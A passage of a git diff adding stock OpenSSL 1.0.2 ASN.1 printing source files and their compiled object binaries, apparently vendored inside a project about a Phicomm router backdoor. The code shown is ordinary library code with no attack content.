ziEun~B-f#h35SJ*_jA0Q;qo41QSZQnpBaVPcf)#*Y`IP@6ZPTzWl{L-&#>sI=dq|;
zzz)idC|n?8g^39Vu8U~C;5$+HgkI<QnX!GMzdK)w7TrP-{)-#{Q*`L;f#W_i;fR3#
zXQhKZZjJh-(+v#M^K=oQFSe17VS#5f?p-%zni}y?g!DEJLc+5dZRHm&?gb{?bL0{1
zko1W%uN+e6$L~q>`CskvUO}H7kZF?hU!@S*a(-EN3l>v!ABcd~DqPyh8t*CDrqUnO
z2NHv-_EF#skk#e7AnbKvCo8%Bvi}q`(5GtODE94y6pC84$KOS@{XZ4{@nCXYaR2c?
xinN#eUu|xj>J>4+jAH>Xv{CKRXSJm|DTEni!IUn;yQ7-@1rh%<Fiw+d{|{U?pd$bP

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/t_pkey.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/t_pkey.c
new file mode 100644
index 0000000..735c342
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/t_pkey.c
@@ -0,0 +1,113 @@
+/* crypto/asn1/t_pkey.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/objects.h>
+#include <openssl/buffer.h>
+#include <openssl/bn.h>
+
+int ASN1_bn_print(BIO *bp, const char *number, const BIGNUM *num,
+                  unsigned char *buf, int off)
+{
+    int n, i;
+    const char *neg;
+
+    if (num == NULL)
+        return (1);
+    neg = (BN_is_negative(num)) ? "-" : "";
+    if (!BIO_indent(bp, off, 128))
+        return 0;
+    if (BN_is_zero(num)) {
+        if (BIO_printf(bp, "%s 0\n", number) <= 0)
+            return 0;
+        return 1;
+    }
+
+    if (BN_num_bytes(num) <= BN_BYTES) {
+        if (BIO_printf(bp, "%s %s%lu (%s0x%lx)\n", number, neg,
+                       (unsigned long)num->d[0], neg,
+                       (unsigned long)num->d[0])
+            <= 0)
+            return (0);
+    } else {
+        buf[0] = 0;
+        if (BIO_printf(bp, "%s%s", number,
+                       (neg[0] == '-') ? " (Negative)" : "") <= 0)
+            return (0);
+        n = BN_bn2bin(num, &buf[1]);
+
+        if (buf[1] & 0x80)
+            n++;
+        else
+            buf++;
+
+        for (i = 0; i < n; i++) {
+            if ((i % 15) == 0) {
+                if (BIO_puts(bp, "\n") <= 0 || !BIO_indent(bp, off + 4, 128))
+                    return 0;
+            }
+            if (BIO_printf(bp, "%02x%s", buf[i], ((i + 1) == n) ? "" : ":")
+                <= 0)
+                return (0);
+        }
+        if (BIO_write(bp, "\n", 1) <= 0)
+            return (0);
+    }
+    return (1);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/t_pkey.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/t_pkey.o
new file mode 100644
index 0000000000000000000000000000000000000000..9b363f8abdb6ecf8db38e616cdc8794c1563ba09
GIT binary patch
literal 3136
zcmbW2Urbw77{E^{9d&NEs8c(qOB3l*qTJlFA+SW#TUyq}J3s;5+@EU;Wov+f?Y&T@
z4w8y`gJt-rFMILP#3zX^J~RP|W-7^I;@e&{(IzHDjdL!#`hEAF1E-fZG5eBp&Ub$2
z`@Zw<yXVeFmEH!2gD`QB=g3ZvQ9?@Y9X({KAtI3d<PXo`JD;ILZ1INYtxrLdUyd7_
zvEqI-l3$7&w<5-dJRCK?l!xNR_ro#c-@#b%2^@_Te)SeEHIr)#*zrWJ#|)*#{fjxY
z1lnRrZwi*mFJREZ8!c|4A5@IrW5o{B!q^IyOxtn*3>4#Mn|I-MXg&~MYHW!cU!$9`
zMLm@zG7v1u1E%vUr^{ssx6s`tZ!|#^%g$Upo5&NrPG?#yd6vg3mCDKDtOF)gj9X?5
zd12l`jI}veW$mPKHyZp&DL#u!j2NRW?nw8KmuHqDE$+`ffIj%^@5LKh2ljhBs|Svl
ztKw&?l)BgAp6F(<6tAqC(HBeetK~oMRw`^g#unwC<(q)zqTXno;P!xiwY&}^*UWp_
zJ}%~Uwd7eX#R}`*Gw0;9@;UjutgfxK5#kH<r7k42^h~Oi94G#qPuh#MKj)v&eF1+?
z%KInst;qa20*%z32ZfyI={fET3@7!Bru(|ZqoULn?9|O}@N&B(O2=9)j7LHmp)^Br
zK{?SkOd24ykU62C9IzVVxbz}%<eMFb_BFXzU>|3JKTgNK!hH=1%~u)}!Mp5?3BF=u
zR0zE1iU`u%dm=(tq3L;HpkY=x6%k(T6;8>}xg&JRf+P!pu;2>|-muUd7TogM#y8)7
zw@Jg+Y;dYZ@>`|WptI(ef_q`RsrGW3yRT;0bDF17i#P3troFokzi$`cYZ5%|YQbd0
zTY&Sg66^e3<bf(m$U(F3B9GemVan}0ev<O1Z1w@lt@(EbA^$*Jq<sgOn$>p^$;Pqk
zBztzzP9P6*_hRM>uqYJFJG-0#P>YY%;jh)<Z`R@O)Zr_2IMLMU@zk6+LPVuU!YYW>
zF|0bUYRBpstd3&Ug;gh!2m69*GNVps(;1DZCzSrMtf>9Hy@Syqbw~~?QI&+_{c1Wh
zngRn<P17+F?o%`Rq?$}?In<Mx_GCI^8R&?>ayFaRQm|f>$E?Q88_c$U;5kI;;yC6U
z<AaprH~uikb;>dS?&tVC<!Jv1$KU5T<{*pz3FR1PAIHC-+#cr#&K}=g7Uw3%1&-s-
z0mUANr5JKA6c)#e4+aRX2Xmb9D98EpQ8<oy$n4KkZl5>9+2c3L>}NQ8{8kyi!g2om
zKdKYwW6mD$n#J*fj)MEbvMpk6Zc<AmiI~%}R(p|Y+0;Zr)KYnkh@%NDLBwP(N5t$D
zcF;U1LT-;tO-^D;ikT@bCBiSEEvF?$#%cdTMi-~EQ`4!eHV3X4Fm+KK%O)mSLT)eQ
z-V`6W;g;<$NeCDUdq1q6Wy^GI4?)2@3PIsTq5*Hy^TZrSmA%}UGbl%(Ah*At?y5sZ
zOG{`t)+JAahB5EeKM1}U)Bf(V`MY6^7dAg@LokTC#2bMw)Aifmf9A*9IQ6%=lZpSi
z|I^@ze@VOfGzC6eV0Qit<9m*4vHP!3kY|Rpwfj#1uXX<cYRK*x?;qbw=FfPoxp68t
tz0h~*I`D0KsD?krwBJ1-vO<6PA7Y0ScJ2(}8&b<ZL>KxxGo-EE|3BQE^3?zU

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/t_req.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/t_req.c
new file mode 100644
index 0000000..024553a
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/t_req.c
@@ -0,0 +1,254 @@
+/* crypto/asn1/t_req.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/buffer.h>
+#include <openssl/bn.h>
+#include <openssl/objects.h>
+#include <openssl/x509.h>
+#include <openssl/x509v3.h>
+#ifndef OPENSSL_NO_RSA
+# include <openssl/rsa.h>
+#endif
+#ifndef OPENSSL_NO_DSA
+# include <openssl/dsa.h>
+#endif
+
+#ifndef OPENSSL_NO_FP_API
+int X509_REQ_print_fp(FILE *fp, X509_REQ *x)
+{
+    BIO *b;
+    int ret;
+
+    if ((b = BIO_new(BIO_s_file())) == NULL) {
+        X509err(X509_F_X509_REQ_PRINT_FP, ERR_R_BUF_LIB);
+        return (0);
+    }
+    BIO_set_fp(b, fp, BIO_NOCLOSE);
+    ret = X509_REQ_print(b, x);
+    BIO_free(b);
+    return (ret);
+}
+#endif
+
+int X509_REQ_print_ex(BIO *bp, X509_REQ *x, unsigned long nmflags,
+                      unsigned long cflag)
+{
+    unsigned long l;
+    int i;
+    const char *neg;
+    X509_REQ_INFO *ri;
+    EVP_PKEY *pkey;
+    STACK_OF(X509_ATTRIBUTE) *sk;
+    STACK_OF(X509_EXTENSION) *exts;
+    char mlch = ' ';
+    int nmindent = 0;
+
+    if ((nmflags & XN_FLAG_SEP_MASK) == XN_FLAG_SEP_MULTILINE) {
+        mlch = '\n';
+        nmindent = 12;
+    }
+
+    if (nmflags == X509_FLAG_COMPAT)
+        nmindent = 16;
+
+    ri = x->req_info;
+    if (!(cflag & X509_FLAG_NO_HEADER)) {
+        if (BIO_write(bp, "Certificate Request:\n", 21) <= 0)
+            goto err;
+        if (BIO_write(bp, "    Data:\n", 10) <= 0)
+            goto err;
+    }
+    if (!(cflag & X509_FLAG_NO_VERSION)) {
+        neg = (ri->version->type == V_ASN1_NEG_INTEGER) ? "-" : "";
+        l = 0;
+        for (i = 0; i < ri->version->length; i++) {
+            l <<= 8;
+            l += ri->version->data[i];
+        }
+        if (BIO_printf(bp, "%8sVersion: %s%lu (%s0x%lx)\n", "", neg, l, neg,
+                       l) <= 0)
+            goto err;
+    }
+    if (!(cflag & X509_FLAG_NO_SUBJECT)) {
+        if (BIO_printf(bp, "        Subject:%c", mlch) <= 0)
+            goto err;
+        if (X509_NAME_print_ex(bp, ri->subject, nmindent, nmflags) < 0)
+            goto err;
+        if (BIO_write(bp, "\n", 1) <= 0)
+            goto err;
+    }
+    if (!(cflag & X509_FLAG_NO_PUBKEY)) {
+        if (BIO_write(bp, "        Subject Public Key Info:\n", 33) <= 0)
+            goto err;
+        if (BIO_printf(bp, "%12sPublic Key Algorithm: ", "") <= 0)
+            goto err;
+        if (i2a_ASN1_OBJECT(bp, ri->pubkey->algor->algorithm) <= 0)
+            goto err;
+        if (BIO_puts(bp, "\n") <= 0)
+            goto err;
+
+        pkey = X509_REQ_get_pubkey(x);
+        if (pkey == NULL) {
+            BIO_printf(bp, "%12sUnable to load Public Key\n", "");
+            ERR_print_errors(bp);
+        } else {
+            EVP_PKEY_print_public(bp, pkey, 16, NULL);
+            EVP_PKEY_free(pkey);
+        }
+    }
+
+    if (!(cflag & X509_FLAG_NO_ATTRIBUTES)) {
+        /* may not be */
+        if (BIO_printf(bp, "%8sAttributes:\n", "") <= 0)
+            goto err;
+
+        sk = x->req_info->attributes;
+        if (sk_X509_ATTRIBUTE_num(sk) == 0) {
+            if (BIO_printf(bp, "%12sa0:00\n", "") <= 0)
+                goto err;
+        } else {
+            for (i = 0; i < sk_X509_ATTRIBUTE_num(sk); i++) {
+                ASN1_TYPE *at;
+                X509_ATTRIBUTE *a;
+                ASN1_BIT_STRING *bs = NULL;
+                ASN1_TYPE *t;
+                int j, type = 0, count = 1, ii = 0;
+
+                a = sk_X509_ATTRIBUTE_value(sk, i);
+                if (X509_REQ_extension_nid(OBJ_obj2nid(a->object)))
+                    continue;
+                if (BIO_printf(bp, "%12s", "") <= 0)
+                    goto err;
+                if ((j = i2a_ASN1_OBJECT(bp, a->object)) > 0) {
+                    if (a->single) {
+                        t = a->value.single;
+                        type = t->type;
+                        bs = t->value.bit_string;
+                    } else {
+                        ii = 0;
+                        count = sk_ASN1_TYPE_num(a->value.set);
+ get_next:
+                        at = sk_ASN1_TYPE_value(a->value.set, ii);
+                        type = at->type;
+                        bs = at->value.asn1_string;
+                    }
+                }
+                for (j = 25 - j; j > 0; j--)
+                    if (BIO_write(bp, " ", 1) != 1)
+                        goto err;
+                if (BIO_puts(bp, ":") <= 0)
+                    goto err;
+                if ((type == V_ASN1_PRINTABLESTRING) ||
+                    (type == V_ASN1_T61STRING) ||
+                    (type == V_ASN1_IA5STRING)) {
+                    if (BIO_write(bp, (char *)bs->data, bs->length)
+                        != bs->length)
+                        goto err;
+                    BIO_puts(bp, "\n");
+                } else {
+                    BIO_puts(bp, "unable to print attribute\n");
+                }
+                if (++ii < count)
+                    goto get_next;
+            }
+        }
+    }
+    if (!(cflag & X509_FLAG_NO_EXTENSIONS)) {
+        exts = X509_REQ_get_extensions(x);
+        if (exts) {
+            BIO_printf(bp, "%8sRequested Extensions:\n", "");
+            for (i = 0; i < sk_X509_EXTENSION_num(exts); i++) {
+                ASN1_OBJECT *obj;
+                X509_EXTENSION *ex;
+                int j;
+                ex = sk_X509_EXTENSION_value(exts, i);
+                if (BIO_printf(bp, "%12s", "") <= 0)
+                    goto err;
+                obj = X509_EXTENSION_get_object(ex);
+                i2a_ASN1_OBJECT(bp, obj);
+                j = X509_EXTENSION_get_critical(ex);
+                if (BIO_printf(bp, ": %s\n", j ? "critical" : "") <= 0)
+                    goto err;
+                if (!X509V3_EXT_print(bp, ex, cflag, 16)) {
+                    BIO_printf(bp, "%16s", "");
+                    M_ASN1_OCTET_STRING_print(bp, ex->value);
+                }
+                if (BIO_write(bp, "\n", 1) <= 0)
+                    goto err;
+            }
+            sk_X509_EXTENSION_pop_free(exts, X509_EXTENSION_free);
+        }
+    }
+
+    if (!(cflag & X509_FLAG_NO_SIGDUMP)) {
+        if (!X509_signature_print(bp, x->sig_alg, x->signature))
+            goto err;
+    }
+
+    return (1);
+ err:
+    X509err(X509_F_X509_REQ_PRINT_EX, ERR_R_BUF_LIB);
+    return (0);
+}
+
+int X509_REQ_print(BIO *bp, X509_REQ *x)
+{
+    return X509_REQ_print_ex(bp, x, XN_FLAG_COMPAT, X509_FLAG_COMPAT);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/t_req.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/t_req.o
new file mode 100644
index 0000000000000000000000000000000000000000..c9297696f6408daf656b5602ced734e7c8c15b0f
GIT binary patch
literal 7352
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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/t_spki.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/t_spki.c
new file mode 100644
index 0000000..3bf48db
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/t_spki.c
@@ -0,0 +1,108 @@
+/* t_spki.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 1999.
+ */
+/* ====================================================================
+ * Copyright (c) 1999 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/x509.h>
+#include <openssl/asn1.h>
+#ifndef OPENSSL_NO_RSA
+# include <openssl/rsa.h>
+#endif
+#ifndef OPENSSL_NO_DSA
+# include <openssl/dsa.h>
+#endif
+#include <openssl/bn.h>
+
+/* Print out an SPKI */
+
+int NETSCAPE_SPKI_print(BIO *out, NETSCAPE_SPKI *spki)
+{
+    EVP_PKEY *pkey;
+    ASN1_IA5STRING *chal;
+    int i, n;
+    char *s;
+    BIO_printf(out, "Netscape SPKI:\n");
+    i = OBJ_obj2nid(spki->spkac->pubkey->algor->algorithm);
